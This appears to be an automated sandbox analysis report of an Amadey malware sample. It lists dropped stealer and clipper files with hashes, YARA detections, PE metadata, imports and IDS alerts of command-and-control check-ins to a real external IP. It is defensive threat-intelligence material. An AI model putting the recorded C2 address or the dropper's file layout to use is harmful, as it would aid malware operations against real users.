                                                        SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                        MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                        SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                        SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                        SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                        Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):91136
                                                        Entropy (8bit):6.3469756750979025
                                                        Encrypted:false
                                                        SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                        MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                        SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                        SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                        SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Joe Sandbox View:
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: QEb6ybdVBd.exe, Detection: malicious, Browse
                                                        • Filename: 9U2j7fIA6J.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):241664
                                                        Entropy (8bit):6.368190069123744
                                                        Encrypted:false
                                                        SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                        MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                        SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                        SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                        SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):407040
                                                        Entropy (8bit):7.714763087804338
                                                        Encrypted:false
                                                        SSDEEP:6144:KDy+bnr+xp0yN90QEiO/jRSuIWQa8nyGmIm93oYobD29LhGCoUsSSQDcxwowWwYd:tMrly909/cpLXyGG934EhGCjvwYWwI/
                                                        MD5:014BF36C5CA48AF27042E0BAF0B6D951
                                                        SHA1:A65CF5FB7CEC3AAB71273A45DCC83B1CC64D9F3F
                                                        SHA-256:C4A0666A243C0AE022C6B06DFCCB8509CD48D879A89B02562296503B620BE701
                                                        SHA-512:9D05081C8CC65B3718E99DC0D05E28EA2BA75D11DD642F94ECA9CC636ABA20EE939D6B8C5BB43057F31554B600012FE8E8816FFCD976CF86D0ED57CFD4AF6998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 51%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ...........................................................p..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......p.......,..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):241664
                                                        Entropy (8bit):6.368190069123744
                                                        Encrypted:false
                                                        SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                        MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                        SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                        SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                        SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):375808
                                                        Entropy (8bit):6.845143402184113
                                                        Encrypted:false
                                                        SSDEEP:6144:NSLLfo0ceBpdxPr/Wcfu7dm93PYobD29LhLCRxuk6o+ALq:NS/foGnxT/WH7k93ZEhLCHr2v
                                                        MD5:A00A64A5A243C8705D68786C6159E402
                                                        SHA1:B1321832BB1DA71B4BFF28E6E3E6749D815398FB
                                                        SHA-256:5D275427202F0DEF0FB46B5E470D56C7CA8999E8C866E4DA7408FB854762FF3D
                                                        SHA-512:A728E81288BD5C48F92BE9BCCADD918E93B8086E5483CD57CCED246B75246BE2B34D961A0788C9092F9A0333AEF28799D40AD6E51D5A92A93FE22480035CEF6A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6BX.W,..W,..W,......W,......W,......W,...W..W,..W-..W,......W,......W,......W,.Rich.W,.........PE..L......b............................Oe.......0....@..........................p..............................................D...x........`...................P.......................................5..@............................................text...<........................... ..`.data...d....0......................@....weh.................6..............@..@.lami................:..............@....rsrc....`.......b...>..............@..@.reloc..8....P......................@..B................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11264
                                                        Entropy (8bit):4.97029807367379
                                                        Encrypted:false
                                                        SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                        MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                        SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                        SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                        SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                        Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):91136
                                                        Entropy (8bit):6.3469756750979025
                                                        Encrypted:false
                                                        SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                        MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                        SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                        SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                        SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):4.621829903792328
                                                        Encrypted:false
                                                        SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                        MD5:1B7C22A214949975556626D7217E9A39
                                                        SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                        SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                        SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                        Malicious:false
                                                        Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                        Process:C:\Windows\SysWOW64\cacls.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):15
                                                        Entropy (8bit):3.240223928941852
                                                        Encrypted:false
                                                        SSDEEP:3:o3F:o1
                                                        MD5:509B054634B6DE74F111C3E646BC80FD
                                                        SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                        SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                        SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                        Malicious:false
                                                        Preview:processed dir:
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.837619492816914
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:file.exe
                                                        File size:598528
                                                        MD5:61a8c6a50c4a2c2990e45bc223464333
                                                        SHA1:87334fa8b57e66c8193d9138f82f31caf2732d73
                                                        SHA256:fe010d21711adca99ed52b577c6bf8e2919f5e08f3ce65ce446f1a92f87a7e34
                                                        SHA512:e5aeba8ecaaeb0fd373d9ed77754d4cd925153f7dc962fe1374696d0f974b020ab61fd1eea0b2ccc963a1100a168a211c81b24c6c040bb243012b7e91c88f4cf
                                                        SSDEEP:12288:pMrdy90JSCGLgBWhJpLEyGG9JjNhGCPvCXWweSfH2S5:cyOWJpYMHNh7PvNwvuo
                                                        TLSH:79D4020BF7F84471E8B05BB058FB03D316357E51973882AA624B7C6A1DB32A4A53536B
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                        Icon Hash:f8e0e4e8ecccc870
                                                        Entrypoint:0x406a60
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:10
                                                        OS Version Minor:0
                                                        File Version Major:10
                                                        File Version Minor:0
                                                        Subsystem Version Major:10
                                                        Subsystem Version Minor:0
                                                        Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                        Instruction
                                                        call 00007F7F11080B45h
                                                        jmp 00007F7F11080455h
                                                        push 00000058h
                                                        push 004072B8h
                                                        call 00007F7F11080BE7h
                                                        xor ebx, ebx
                                                        mov dword ptr [ebp-20h], ebx
                                                        lea eax, dword ptr [ebp-68h]
                                                        push eax
                                                        call dword ptr [0040A184h]
                                                        mov dword ptr [ebp-04h], ebx
                                                        mov eax, dword ptr fs:[00000018h]
                                                        mov esi, dword ptr [eax+04h]
                                                        mov edi, ebx
                                                        mov edx, 004088ACh
                                                        mov ecx, esi
                                                        xor eax, eax
                                                        lock cmpxchg dword ptr [edx], ecx
                                                        test eax, eax
                                                        je 00007F7F1108046Ah
                                                        cmp eax, esi
                                                        jne 00007F7F11080459h
                                                        xor esi, esi
                                                        inc esi
                                                        mov edi, esi
                                                        jmp 00007F7F11080462h
                                                        push 000003E8h
                                                        call dword ptr [0040A188h]
                                                        jmp 00007F7F11080429h
                                                        xor esi, esi
                                                        inc esi
                                                        cmp dword ptr [004088B0h], esi
                                                        jne 00007F7F1108045Ch
                                                        push 0000001Fh
                                                        call 00007F7F1108097Bh
                                                        pop ecx
                                                        jmp 00007F7F1108048Ch
                                                        cmp dword ptr [004088B0h], ebx
                                                        jne 00007F7F1108047Eh
                                                        mov dword ptr [004088B0h], esi
                                                        push 004010C4h
                                                        push 004010B8h
                                                        call 00007F7F110805A6h
                                                        pop ecx
                                                        pop ecx
                                                        test eax, eax
                                                        je 00007F7F11080469h
                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                        mov eax, 000000FFh
                                                        jmp 00007F7F11080589h
                                                        mov dword ptr [004081E4h], esi
                                                        cmp dword ptr [004088B0h], esi
                                                        jne 00007F7F1108046Dh
                                                        push 004010B4h
                                                        push 004010ACh
                                                        call 00007F7F11080B35h
                                                        pop ecx
                                                        pop ecx
                                                        mov dword ptr [000088B0h], 00000000h
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x89a60.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000x888.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc0000x8a0000x89c00False0.9323672867513612data7.877195907451372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x960000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountry
                                                        AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                        RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                        RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                        RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                        RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                        RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                        RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                        RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                        RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                        RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                        RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                        RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                        RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                        RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                        RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                        RT_DIALOG0x24a340x35cdataRussianRussia
                                                        RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                        RT_DIALOG0x24f400x1b4dataRussianRussia
                                                        RT_DIALOG0x250f40x166dataEnglishUnited States
                                                        RT_DIALOG0x2525c0x168dataRussianRussia
                                                        RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                        RT_DIALOG0x255840x1e0dataRussianRussia
                                                        RT_DIALOG0x257640x130dataEnglishUnited States
                                                        RT_DIALOG0x258940x150dataRussianRussia
                                                        RT_DIALOG0x259e40x120dataEnglishUnited States
                                                        RT_DIALOG0x25b040x122dataRussianRussia
                                                        RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                        RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                        RT_STRING0x25d3c0x520dataEnglishUnited States
                                                        RT_STRING0x2625c0x52edataRussianRussia
                                                        RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                        RT_STRING0x26d580x592dataRussianRussia
                                                        RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                        RT_STRING0x2779c0x4b2dataRussianRussia
                                                        RT_STRING0x27c500x44adataEnglishUnited States
                                                        RT_STRING0x2809c0x43edataRussianRussia
                                                        RT_STRING0x284dc0x3cedataEnglishUnited States
                                                        RT_STRING0x288ac0x2fcdataRussianRussia
                                                        RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                        RT_RCDATA0x28bb00x6bd84Microsoft Cabinet archive data, many, 441732 bytes, 2 files, at 0x2c +A "bjAg.exe" +A "xriv.exe", ID 1565, number 1, 20 datablocks, 0x1503 compressionEnglishUnited States
                                                        RT_RCDATA0x949340x4dataEnglishUnited States
                                                        RT_RCDATA0x949380x24dataEnglishUnited States
                                                        RT_RCDATA0x9495c0x7ASCII text, with no line terminatorsEnglishUnited States
                                                        RT_RCDATA0x949640x7ASCII text, with no line terminatorsEnglishUnited States
                                                        RT_RCDATA0x9496c0x4dataEnglishUnited States
                                                        RT_RCDATA0x949700x9ASCII text, with no line terminatorsEnglishUnited States
                                                        RT_RCDATA0x9497c0x4dataEnglishUnited States
                                                        RT_RCDATA0x949800x9ASCII text, with no line terminatorsEnglishUnited States
                                                        RT_RCDATA0x9498c0x4dataEnglishUnited States
                                                        RT_RCDATA0x949900x6dataEnglishUnited States
                                                        RT_RCDATA0x949980x7ASCII text, with no line terminatorsEnglishUnited States
                                                        RT_RCDATA0x949a00x7ASCII text, with no line terminatorsEnglishUnited States
                                                        RT_GROUP_ICON0x949a80xbcdataEnglishUnited States
                                                        RT_VERSION0x94a640x408dataEnglishUnited States
                                                        RT_VERSION0x94e6c0x410dataRussianRussia
                                                        RT_MANIFEST0x9527c0x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                        DLLImport
                                                        ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                        KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                        GDI32.dllGetDeviceCaps
                                                        USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                        msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                        COMCTL32.dll
                                                        Cabinet.dll
                                                        VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        RussianRussia
                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        192.168.2.562.204.41.449780802027700 02/06/23-14:17:06.175418TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450240802027700 02/06/23-14:19:16.745453TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449716802027700 02/06/23-14:16:36.096630TCP2027700ET TROJAN Amadey CnC Check-In4971680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449814802027700 02/06/23-14:17:21.151914TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449912802027700 02/06/23-14:17:47.771913TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.562.204.41.4
